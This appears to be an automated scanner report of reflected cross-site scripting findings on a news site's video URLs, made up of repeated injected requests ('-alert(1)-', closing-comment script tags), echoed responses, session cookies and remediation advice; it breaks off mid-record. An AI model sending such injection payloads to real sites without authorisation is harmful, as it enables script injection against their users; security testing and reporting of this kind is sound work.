<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e59"><a>4921c5333d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video22e59"><a>4921c5333d1/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:39:54 GMT Date: Mon, 22 Nov 2010 00:34:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video22e59"><a>4921c5333d1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1779"><a>34b474d6ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosc1779"><a>34b474d6ab2/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:40:36 GMT Date: Mon, 22 Nov 2010 00:36:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosc1779"><a>34b474d6ab2 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 231ac"-alert(1)-"9a0830762d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos231ac"-alert(1)-"9a0830762d1/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:09 GMT Date: Mon, 22 Nov 2010 00:37:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e72e5"><a>daaf07f0b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/lateste72e5"><a>daaf07f0b88/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:42:06 GMT Date: Mon, 22 Nov 2010 00:37:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_lateste72e5"><a>daaf07f0b88"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad97a"-alert(1)-"e1623f9f7aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestad97a"-alert(1)-"e1623f9f7aa/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:14 GMT Date: Mon, 22 Nov 2010 00:38:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6c6"-alert(1)-"a7781cc6a32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633ae6c6"-alert(1)-"a7781cc6a32/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57180"-alert(1)-"e82ff3c20cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer57180"-alert(1)-"e82ff3c20cc/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:43:17 GMT Date: Mon, 22 Nov 2010 00:38:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f41"-alert(1)-"ec58efd1064 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001c5f41"-alert(1)-"ec58efd1064 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:43:50 GMT Date: Mon, 22 Nov 2010 00:38:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c71e2--><script>alert(1)</script>6815d60c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29477 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:39 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a36"><a>69c504b8c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa9a36"><a>69c504b8c86/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29440 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:40:45 GMT Date: Mon, 22 Nov 2010 00:35:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa9a36"><a>69c504b8c86 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ea9"><a>5355e0c47b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos27ea9"><a>5355e0c47b2/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:41:35 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos27ea9"><a>5355e0c47b2 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b973"-alert(1)-"1cd8a1ddd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7b973"-alert(1)-"1cd8a1ddd78/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:43 GMT Date: Mon, 22 Nov 2010 00:37:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1aa"><a>b764377f1e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest8e1aa"><a>b764377f1e7/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest8e1aa"><a>b764377f1e7"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"-alert(1)-"3d3ca4afe87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestf815d"-alert(1)-"3d3ca4afe87/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:52 GMT Date: Mon, 22 Nov 2010 00:38:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c31ad"-alert(1)-"cf3b712c3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633c31ad"-alert(1)-"cf3b712c3a/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:44:12 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... pt type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f428a"-alert(1)-"7fe3d28d3e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earthf428a"-alert(1)-"7fe3d28d3e9/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:44:15 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6174"-alert(1)-"0c39f2dcc8b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001f6174"-alert(1)-"0c39f2dcc8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
